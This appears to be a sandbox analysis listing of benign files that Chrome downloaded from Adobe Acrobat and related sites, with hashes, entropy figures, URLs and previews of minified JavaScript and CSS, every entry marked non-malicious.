                  Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[9061],{eqJu:(e,t,n)=>{"use strict";n.d(t,{E:()=>a});var s=n("plsW");const o={logging:()=>s.logging,safeSessionStorage:()=>window.sessionStorage,safeLocalStorage:()=>window.localStorage,floodgate:()=>s.providers.floodgate(),locale:()=>s.locale2};const a=new class MockComponentHandler{constructor(){this.components=new Map}init(){}registerImplementation(e,t){this.components.set(e,t)}unRegisterComponent(e){this.components.delete(e)}locateImplementation(e){return o.hasOwnProperty(e)?o[e]():this.components.get(e)}reset(){this.components.clear()}}},Uohe:(e,t,n)=>{"use strict";n.d(t,{Po:()=>a,Xw:()=>o,zS:()=>r});var s=n("tr63");const o=(0,s.Ig)("IAuth2API"),a=(0,s.Ig)("ILocale2API"),r=(0,s.Ig)("IAnalytics")},tr63:(e,t,n)=>{"use strict";n.d(t,{Ig:()=>locateImplementationSync,fl:()=>locateImplementation,wy:()=>registerImplementation});var s=n("plsW"),o=n("eqJu");const registerImplementation=(e,t)=>{o.E.registerImplementation(e,t)
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (32424), with no line terminators
                  Category:downloaded
                  Size (bytes):32434
                  Entropy (8bit):4.82789881878106
                  Encrypted:false
                  SSDEEP:
                  MD5:306E939268FBE47BADFF02C94BED2CA3
                  SHA1:0CD8EA78C3CF079723FEE16ABFE09B9BB2A27787
                  SHA-256:5778EA1BE948A105DC062FD7B1874EFFA659CDE8F3AC2BAAFD6F6FE5BE68D1AF
                  SHA-512:4CA0A4BC61869AB11D364198052F61A18232D22551AC23B2AEA9B020BB21807C068E88A399366E6279881025186BA4F48571A5E5AB546EB6C9A6A7B7037EFCC0
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-home3-dropin/3.58.0_1.572.0/translations-en-US-json-chunk.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},o=(new e.Error).stack;o&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[o]="7e9f7e1c-3814-4d6c-a680-dfe5c3772b42",e._sentryDebugIdIdentifier="sentry-dbid-7e9f7e1c-3814-4d6c-a680-dfe5c3772b42")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"263853adbe3f8c6ef3e7fe097b0d550acf2a7b0f"},(self["webpackJsonp-home3"]=self["webpackJsonp-home3"]||[]).push([[3577],{t39f:e=>{e.exports=JSON.parse('{"homeBanner.bannerStateChange.expandBanner":"Expand banner","homeBanner.bannerStateChange.collapseBanner":"Collapse banner","carousel.pageNumber":"Page number {pageNumber}","carousel.previousButton":"View previous feature highlight","carousel.nextButton":"View next feature highlight","carousel.playButton":"Select to restart the carousel animation","carousel.pauseBut
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):122122
                  Entropy (8bit):5.643746806819283
                  Encrypted:false
                  SSDEEP:
                  MD5:1CC1C2319E19DEC7D92586AE7639E792
                  SHA1:AFB1F506163CB4117529B250F96D0C501D6B7A40
                  SHA-256:F2CF64E52E05B409152E344519AD274D9F1BF03DF18572AA883E81253F82659B
                  SHA-512:661E313EAF73D7FB39B2291436F6BC0EF9D97CAF495E33135DCAC23AC12CDFE4C6F21367827A328C0A67E2A00ACEFA722D812E67B8C7E1E28A36F2277D377C48
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/genAIViewer-chunk.js
                  Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[8071],{BhaE:(e,t,n)=>{"use strict";t.f=function A4uVisibility(e){var t=_extends({},e);return i.default.createElement("svg",_extends({viewBox:"0 0 36 36"},t,t),i.default.createElement("path",{fillRule:"evenodd",d:"M24.613,8.58A14.972,14.972,0,0,0,18,6.937c-8.664,0-15.75,8.625-15.75,11.423,0,3,7.458,10.7,15.686,10.7,8.3,0,15.814-7.706,15.814-10.7C33.75,16,29.536,11.019,24.613,8.58ZM18,27.225A9.225,9.225,0,1,1,27.225,18,9.225,9.225,0,0,1,18,27.225Z"}),i.default.createElement("path",{fillRule:"evenodd",d:"M20.667,18.083A2.667,2.667,0,0,1,18,15.417a2.632,2.632,0,0,1,1.35-2.27A4.939,4.939,0,0,0,18,12.938,5.063,5.063,0,1,0,23.063,18a4.713,4.713,0,0,0-.175-1.2A2.625,2.625,0,0,1,20.667,18.083Z"}))};var i=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(n("YWiy"));function _extends(){return _extends=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(va
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):332270
                  Entropy (8bit):5.761223767964961
                  Encrypted:false
                  SSDEEP:
                  MD5:8580741F17C688FEA5FEE6AD78A9D36B
                  SHA1:B6236C16E60F6203E965E486F2B69CA7B7FF8F57
                  SHA-256:7EA5B9A6FDEA6197096ABB31592BC5EBD64A8331908A73FC42BF3864E7D5502C
                  SHA-512:C95DF095A18D3E0DE09B16F3B9FEE87FF37AB4ACF863B6AA0276D5CD4C08FBD24DC607E9938BD41D1CF7CDCD51265D32137828E79D2CAF96FE1EB4A109F44CCD
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-side-nav-dropin/3.46.1_1.312.0/bootstrap.js
                  Preview:(()=>{var e,t,n={Faz6:(e,t,n)=>{"use strict";t.z=function A4uOpenIn(e){var t=_extends({},e);return o.default.createElement("svg",_extends({viewBox:"0 0 36 36"},t,t),o.default.createElement("path",{fillRule:"evenodd",d:"M33,2H3A1,1,0,0,0,2,3V17a1,1,0,0,0,1,1H5a1,1,0,0,0,1-1V6H30V30H19a1,1,0,0,0-1,1v2a1,1,0,0,0,1,1H33a1,1,0,0,0,1-1V3A1,1,0,0,0,33,2Z"}),o.default.createElement("path",{fillRule:"evenodd",d:"M18.63574,27.7644A.78433.78433,0,0,0,19.19629,28,.80333.80333,0,0,0,20,27.24573V16.49585A.4973.4973,0,0,0,19.50415,16H8.75439A.80288.80288,0,0,0,8,16.80371a.78548.78548,0,0,0,.23535.56055L12.02148,21.15,2.97891,30.19236a1,1,0,0,0,0,1.41422l1.41433,1.41434a1,1,0,0,0,1.41423,0l9.04215-9.04239Z"}))};var o=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(n("YWiy"));function _extends(){return _extends=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)Object.prototype.hasOwnProperty.call(n,o)&&(e[o]=n[o
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65491)
                  Category:downloaded
                  Size (bytes):306616
                  Entropy (8bit):5.195816548521801
                  Encrypted:false
                  SSDEEP:
                  MD5:E21E97A4906CFBC4DE8C109BDDC45D23
                  SHA1:373B19C045861BE3BD0124BE05028F5E218369D4
                  SHA-256:663CDB5B56741F41C4C71445B6E2776E0BC4C43C9F2BD58D7AAA8740CE9BD85F
                  SHA-512:2240E8C3FBC59C5FDF34FAC2405F3D98B2733426727FBA7B8C24417604C6C562E2B6B9A0024D3B40095B0AA371F44C5E82F5D7175BA547356F968B75FFDB2F15
                  Malicious:false
                  Reputation:unknown
                  URL:https://ui.messaging.adobe.com/2.78.7/style.css
                  Preview:.react-spectrum-provider{position:relative}../*! normalize.css v7.0.0 | MIT License | github.com/necolas/normalize.css */html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;line-height:1.15}body{margin:0}article,aside,footer,header,nav,section{display:block}h1{font-size:2em;margin:.67em 0}figcaption,figure,main{display:block}figure{margin:1em 40px}hr{box-sizing:content-box;height:0;overflow:visible}pre{font-family:monospace,monospace;font-size:1em}a{-webkit-text-decoration-skip:objects;background-color:transparent}abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}b,strong{font-weight:inherit;font-weight:bolder}code,kbd,samp{font-family:monospace,monospace;font-size:1em}dfn{font-style:italic}mark{background-color:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{bo
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (19800)
                  Category:downloaded
                  Size (bytes):19915
                  Entropy (8bit):5.423171833865133
                  Encrypted:false
                  SSDEEP:
                  MD5:7EFC35D6333E781945B9F99032D05D6C
                  SHA1:AED9FF0060687861AD2A39424B47FC13AE0CAC33
                  SHA-256:429F1E791CC88C6B8B9C28ED8E675E1201B48EC50A0FAC4455007E4CB102A95F
                  SHA-512:B75C94B51DEF7AEB7DF477E157DC6A2080311ACAAD3E00D287B9E51A812A70142F5A3C62B10CC2E8EC0F25152C82A278C207CBBC24D98958876566EFF7ADEDCD
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/2345-chunk.js
                  Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[2345],{aPRU:(n,e,a)=>{"use strict";a.r(e),a.d(e,{default:()=>t});var r=a("cOr2"),o=a.n(r),s=a("yGwj"),i=a.n(s)()(o());i.push([n.id,'.CIB44a_i18nFontFamily {\n font-synthesis: weight;\n font-family: adobe-clean, Source Sans Pro, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Ubuntu, Trebuchet MS, Lucida Grande, sans-serif;\n}\n\n.CIB44a_i18nFontFamily:lang(ar) {\n font-family: myriad-arabic, adobe-clean, Source Sans Pro, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Ubuntu, Trebuchet MS, Lucida Grande, sans-serif;\n}\n\n.CIB44a_i18nFontFamily:lang(he) {\n font-family: myriad-hebrew, adobe-clean, Source Sans Pro, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Ubuntu, Trebuchet MS, Lucida Grande, sans-serif;\n}\n\n.CIB44a_i18nFontFamily:lang(zh) {\n font-family: adobe-clean-han-traditional, source-han-traditional, MingLiu, Heiti TC Light, sans-serif;\n}\n\n.CIB44a_i18nFontFamily:lang(zh-Hans) {\n f
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (6350)
                  Category:downloaded
                  Size (bytes):6397
                  Entropy (8bit):5.412175017074974
                  Encrypted:false
                  SSDEEP:
                  MD5:2D7528A8B93F65D5182C29C1B96DB0CE
                  SHA1:7B7EAFA05E042319AF9555B496BF8BA4026BCD51
                  SHA-256:192A92935ABF0637141225A0F014AB7EF55F3F2967565023FD14B00CED97ABB6
                  SHA-512:FFFDDF99383078B8CC405A28101CFC4D5CFCD8DB931DFEEE5A950BF60651C021A78AA7C897D24EBAE05AE2B96E57561FC2FBDB1D75637197226EE6C36952DDBA
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/5794-chunk.js
                  Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[5794],{vS73:(t,e,r)=>{"use strict";var a;r.d(e,{B:()=>a}),function(t){t.TRY_NOW="TRY_NOW",t.OPT_IN_COMPLETE="OPT_IN_COMPLETE",t.WAITLISTED="WAITLISTED"}(a||(a={}))},"T/bE":(t,e,r)=>{var a=r("94sX"),o=r("ue/d"),n=r("eVIm"),s=r("RGrk"),i=r("Z2pD");function Hash(t){var e=-1,r=null==t?0:t.length;for(this.clear();++e<r;){var a=t[e];this.set(a[0],a[1])}}Hash.prototype.clear=a,Hash.prototype.delete=o,Hash.prototype.get=n,Hash.prototype.has=s,Hash.prototype.set=i,t.exports=Hash},duB3:(t,e,r)=>{var a=r("WxI4"),o=r("dFpP"),n=r("JBvZ"),s=r("2Hvv"),i=r("deUO");function ListCache(t){var e=-1,r=null==t?0:t.length;for(this.clear();++e<r;){var a=t[e];this.set(a[0],a[1])}}ListCache.prototype.clear=a,ListCache.prototype.delete=o,ListCache.prototype.get=n,ListCache.prototype.has=s,ListCache.prototype.set=i,t.exports=ListCache},POb3:(t,e,r)=>{var a=r("ICSD")(r("TQ3y"),"Map");t.exports=a},YeCl:(t,e,r)=>{var a=r("CW5P"),o=r("A9mX"),n=r("v8Dt
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (22613)
                  Category:downloaded
                  Size (bytes):22660
                  Entropy (8bit):5.468330798455629
                  Encrypted:false
                  SSDEEP:
                  MD5:AA98DD26377ED5324FC61ABFE9676427
                  SHA1:374B127976ACCA43741EBF2C78E26BDB3253382E
                  SHA-256:82A4B2EEF4C8F522D527DE676460C8D3F56D551A0791E5CA8934959E425D5E73
                  SHA-512:D1958B059836CE76249ECD32827DBC18A8057F1DE202ED8E30A9AF1114E928C957982D01A33B6612DB780ABCBB8A8D7D1891FC6871879C059BA296F5146CAFC6
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-home2-dropin/3.52.0_2.1349.0/8526-chunk.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},r=(new e.Error).stack;r&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[r]="7e8d07d3-c39a-4044-be89-ea9dc48894a4",e._sentryDebugIdIdentifier="sentry-dbid-7e8d07d3-c39a-4044-be89-ea9dc48894a4")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"939110932eed36816ac9d538606bc3479c9c8233"},(self["webpackJsonp-home2"]=self["webpackJsonp-home2"]||[]).push([[8526],{ZCVc:(e,r,t)=>{"use strict";r.N=function A4uCheckmark(e){var r=_extends({},e);return a.default.createElement("svg",_extends({viewBox:"0 0 36 36"},r,r),a.default.createElement("path",{fillRule:"evenodd",d:"M31.312,7.725,29.857,6.592a1,1,0,0,0-1.4.175L14.822,24.283,8.175,17.671a1,1,0,0,0-1.414,0L5.436,19a1,1,0,0,0,0,1.414l8.926,8.9a1,1,0,0,0,1.5-.093L31.487,9.128A1,1,0,0,0,31.312,7.725Z"}))};var a=f
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (61122)
                  Category:downloaded
                  Size (bytes):61170
                  Entropy (8bit):5.555300214632906
                  Encrypted:false
                  SSDEEP:
                  MD5:43C2C23FF6A00A69F1696993DBFA9E7A
                  SHA1:C2DDCA718AFD3859C3B70B0E69A734CD1BAED427
                  SHA-256:1233EA47812ADD87A64BC270918E92CFDBE569DF55C92A384FD0FF4237E50320
                  SHA-512:7A070F04B3A9D345DC95411E567019C9412E2293EF76B26AE68C534A6197D31042372BF713ACC00379743E9887631C5FB192981A547D3FD583BDC62CF3029993
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-files-dropin/3.18.0_2.66.0/bootstrap.js
                  Preview:(()=>{var e,t,r,n,o={"6jw6":(e,t,r)=>{e.exports=r("EtOT")},AXyZ:e=>{"use strict";e.exports=function(e){var t=[];return t.toString=function toString(){return this.map((function(t){var r=function cssWithMappingToString(e,t){var r=e[1]||"",n=e[3];if(!n)return r;if(t&&"function"==typeof btoa){var o=function toComment(e){var t=btoa(unescape(encodeURIComponent(JSON.stringify(e)))),r="sourceMappingURL=data:application/json;charset=utf-8;base64,".concat(t);return"/*# ".concat(r," */")}(n),i=n.sources.map((function(e){return"/*# sourceURL=".concat(n.sourceRoot||"").concat(e," */")}));return[r].concat(i).concat([o]).join("\n")}return[r].join("\n")}(t,e);return t[2]?"@media ".concat(t[2]," {").concat(r,"}"):r})).join("")},t.i=function(e,r,n){"string"==typeof e&&(e=[[null,e,""]]);var o={};if(n)for(var i=0;i<this.length;i++){var a=this[i][0];null!=a&&(o[a]=!0)}for(var s=0;s<e.length;s++){var l=[].concat(e[s]);n&&o[l[0]]||(r&&(l[2]?l[2]="".concat(r," and ").concat(l[2]):l[2]=r),t.push(l))}},t}},qN0T
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (13551)
                  Category:downloaded
                  Size (bytes):13598
                  Entropy (8bit):5.414886307292016
                  Encrypted:false
                  SSDEEP:
                  MD5:A20A7773E5B57EA566CDD02AED5586F4
                  SHA1:72F53A5CFAF226E16BB885E11DC15D40FB2824BD
                  SHA-256:DB2E4B628DEA88674035A29714A04C3172B05D030FD9C25EF2FA98D904475C7E
                  SHA-512:4788FBACB6E333D9C3087AE15C17FB9EFF2E509FBA9088068397850F1B50FBD2D6AF7A75DB0272FA78F9277FE8CF0DC449A7631DF4D989AD48132817E6CF16E5
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-files2-dropin/3.58.0_2.723.0/demo-chunk.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="b634f9d3-e7fe-4b40-ab85-c59bd1ab6287",e._sentryDebugIdIdentifier="sentry-dbid-b634f9d3-e7fe-4b40-ab85-c59bd1ab6287")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"3cf5c6bf825d9ccdf1ebf0bfd9737649fd92cc3f"},(self["webpackJsonp-files2"]=self["webpackJsonp-files2"]||[]).push([[2594],{"407V":(e,t,n)=>{var o={"./chat-pdf-demo-v3/verb-genai/index.js":["zB+R",6252],"./chat-pdf-demo-v4/verb-genai/index.js":["LuXo",9061],"./onboarding-demo/verb-genai/index.js":["bruu",1870]};function webpackAsyncContext(e){if(!n.o(o,e))return Promise.resolve().then((()=>{var t=new Error("Cannot find module '"+e+"'");throw t.code="MODULE_NOT_FOUND",t}));var t=o[e],i=t[0];return n.e(t[1]).then((()=>
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):66384
                  Entropy (8bit):4.7806810800438555
                  Encrypted:false
                  SSDEEP:
                  MD5:9E1B6F5717299A2F3DB918379C73F6A8
                  SHA1:32B9EFFFC4CB5423A030B901D6EAA5BFC3FB2E70
                  SHA-256:D4CBBCAE784B3B73233332BE23879146A1EBCCDBCD01A168E6C344FF6E1F4424
                  SHA-512:418B0619CA4DB531E74BB7D27E2B5F157AD0FF3F66B576FC8986319C1647999975334AE739BFB4EB60197020021D034FC054ED5CC2ECB31F2258874E7DA92D99
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-fillsign2-dropin/3.17.1_1.498.0/nextactionspanel-chunk.js
                  Preview:(self["webpackJsonp-fillsign2"]=self["webpackJsonp-fillsign2"]||[]).push([[5905],{"jm/q":(e,C,t)=>{"use strict";t.r(C),t.d(C,{NextActionsPanelContent:()=>w,autoOpenEnabled:()=>autoOpenEnabled,handleFillSignDataChanged:()=>handleFillSignDataChanged,maybeAutoOpenRHP:()=>maybeAutoOpenRHP,registerObservers:()=>registerObservers,rhpActionCallback:()=>rhpActionCallback,rhpCloseEvent:()=>rhpCloseEvent,rhpHistoryListener:()=>rhpHistoryListener,rhpOpenEvent:()=>rhpOpenEvent,rhpShownVerbsEvents:()=>rhpShownVerbsEvents,setRhpOpenTime:()=>setRhpOpenTime});var n=t("YWiy"),r=t("/hLX"),l=t.n(r),i=t("plsW"),o=t("Zm2D"),a=t("UpqL");const c=["locale","messages"];const wrapOriginalApp=e=>{const C=(0,o.injectIntl)(e);class Wrapped extends n.Component{constructor(){super(),this.setIntlProvider=this.setIntlProvider.bind(this)}setIntlProvider(e){e&&(this.intlProvider=e)}render(){const e=this.props,{locale:t,messages:r}=e,l=function _objectWithoutProperties(e,C){if(null==e)return{};var t,n,r=function _objectW
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (12808)
                  Category:downloaded
                  Size (bytes):12866
                  Entropy (8bit):5.658746832005109
                  Encrypted:false
                  SSDEEP:
                  MD5:EA10A9915C10AD09FB0CB045CC1A398C
                  SHA1:2B2BB22C149EFC7ACA96E281E92AEF5EDD91A606
                  SHA-256:33EB9B44AF17749AFFC7CF01052F38B989EAA75C69A6FB7599A018FE01C3718F
                  SHA-512:EAA529E28D10686DD710E098B09D4F83787B7CF7F21A3E4E0CBDD7120409629EBDD889EAFF86E678B74A8A82AF096F997239FAE816A6BD138750DAC9DE781EC2
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1122.0/assistantButton-chunk.js
                  Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[9573],{JkRg:(t,n,s)=>{"use strict";s.r(n),s.d(n,{default:()=>b});var a=s("YWiy"),o=s("plsW"),i=s("Uohe"),e=s("af1i"),r=s("PZ3W"),A=s.n(r),d=s("Zm2D"),l=s("zjjr"),u=s("oDTv"),_=s.n(u),p=s("JTTx"),c=s.n(p),B=s("wQpj"),C=s("WsOM"),g=s("98vq"),__awaiter=function(t,n,s,a){return new(s||(s=Promise))((function(o,i){function fulfilled(t){try{step(a.next(t))}catch(t){i(t)}}function rejected(t){try{step(a.throw(t))}catch(t){i(t)}}function step(t){t.done?o(t.value):function adopt(t){return t instanceof s?t:new s((function(n){n(t)}))}(t.value).then(fulfilled,rejected)}step((a=a.apply(t,n||[])).next())}))};const AssistantButton=t=>{let{onClick:n,isDisabled:s,shouldForceExpand:i,isSelected:r,label:u,style:p}=t;const[g,b]=(0,a.useState)(!1);(0,a.useEffect)((()=>{__awaiter(void 0,void 0,void 0,(function*(){(yield o.providers.device()).isMobileDevice()&&b(!0)}))}),[g]);const isDesktopSmallScreen=()=>{const t=window.matchMedia&&window.ma
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (48316), with no line terminators
                  Category:downloaded
                  Size (bytes):48316
                  Entropy (8bit):5.6346993394709
                  Encrypted:false
                  SSDEEP:
                  MD5:2CA03AD87885AB983541092B87ADB299
                  SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                  SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                  SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                  Malicious:false
                  Reputation:unknown
                  URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65458)
                  Category:downloaded
                  Size (bytes):557539
                  Entropy (8bit):5.652502227158188
                  Encrypted:false
                  SSDEEP:
                  MD5:672FE642E3F878D1834D317BD7E26D39
                  SHA1:9E5DDD1C6E4FB39B8D9F16030C83ECC2D9069632
                  SHA-256:111E681C825E14BB38BD4E11F470DA058047DFB98474FA414088D52343F3402A
                  SHA-512:FA98E5C18A9C721711D38CEA1B54BBD858CA7B2A1EB2B96CC00AE6AA1676C6DC3F0B8EB4D1071A5AA716A41293E7C7B46246DA8BE0B910F2E831232002EE1D2D
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dcpreviewdropin/3.46.1_2.1134.0/acroform-chunk-chunk.js
                  Preview:/*! For license information please see acroform-chunk-chunk.js.LICENSE.txt */.(self["webpackJsonp-preview"]=self["webpackJsonp-preview"]||[]).push([[9035],{"8G+c":(t,y,T)=>{var R;self,R=(t,y,T,R)=>(()=>{var P,M,N,L,B={7757:(t,y,T)=>{t.exports=T(5666)},3070:(t,y,T)=>{"use strict";T.d(y,{Z:()=>gl});var R=T(3144),P=T(5671);function i(t){if(void 0===t)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return t}function a(t,y){return a=Object.setPrototypeOf||function(t,y){return t.__proto__=y,t},a(t,y)}function s(t,y){if("function"!=typeof y&&null!==y)throw new TypeError("Super expression must either be null or a function");t.prototype=Object.create(y&&y.prototype,{constructor:{value:t,writable:!0,configurable:!0}}),y&&a(t,y)}function l(t){return l="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},l(t)}func
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):210621
                  Entropy (8bit):5.294548291869375
                  Encrypted:false
                  SSDEEP:
                  MD5:67A607D4160D4881B94475DCEAB9C079
                  SHA1:EF22A2FFD8F96A30D29AB23AC85CB7F34D08407C
                  SHA-256:E1A0B5C982352BFB88C6EC981BB50672AA6FD99F81B71C0953602EB2FD482807
                  SHA-512:3E84AE8EF396E6975DF9646BBC2C8F852A14A8F72022A9C666733BF1B499A678E98D3318EA1824BDABEC7CB98EA009CEB939D16E1270944613EF93E6F67D9907
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/store/_next/static/chunks/framework-7e3a90023a38ee96.js
                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[774],{787774:function(e,t,n){var r=n(667294);function a(e){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+e,n=1;n<arguments.length;n++)t+="&args[]="+encodeURIComponent(arguments[n]);return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var l=Object.prototype.hasOwnProperty,o=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\-.0-9\u00B7\u0300-\u036F\u203F-\u2040]*$/,u={},i={};function s(e){return!!l.call(i,e)||!l.call(u,e)&&(o.test(e)?i[e]=!0:(u[e]=!0,!1))}function c(e,t,n,r,a,l,o){this.acceptsBooleans=2===t||3===t||4===t,this.attributeName=r
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):280749
                  Entropy (8bit):5.45234751764769
                  Encrypted:false
                  SSDEEP:
                  MD5:9B1FF889BD53F1013B1907561EA476D9
                  SHA1:C656EC33BB88FE3D87DAFC0DEA75FEA255F9CC5F
                  SHA-256:5D9BA3B79CB2B561E63ABBF4888CDB31958BF55532B8CD6DD13E677687F8ECE4
                  SHA-512:E71B5A0C9669F508FE3ECDCB91D7606BB81C687A77648CAE0D55203069E92951CDB6B1FA7615535740498F173881C038558CF7959F83326F7B636EB74224BD62
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-global-nav-dropin/3.58.0_3.586.0/global-nav-chunk.js
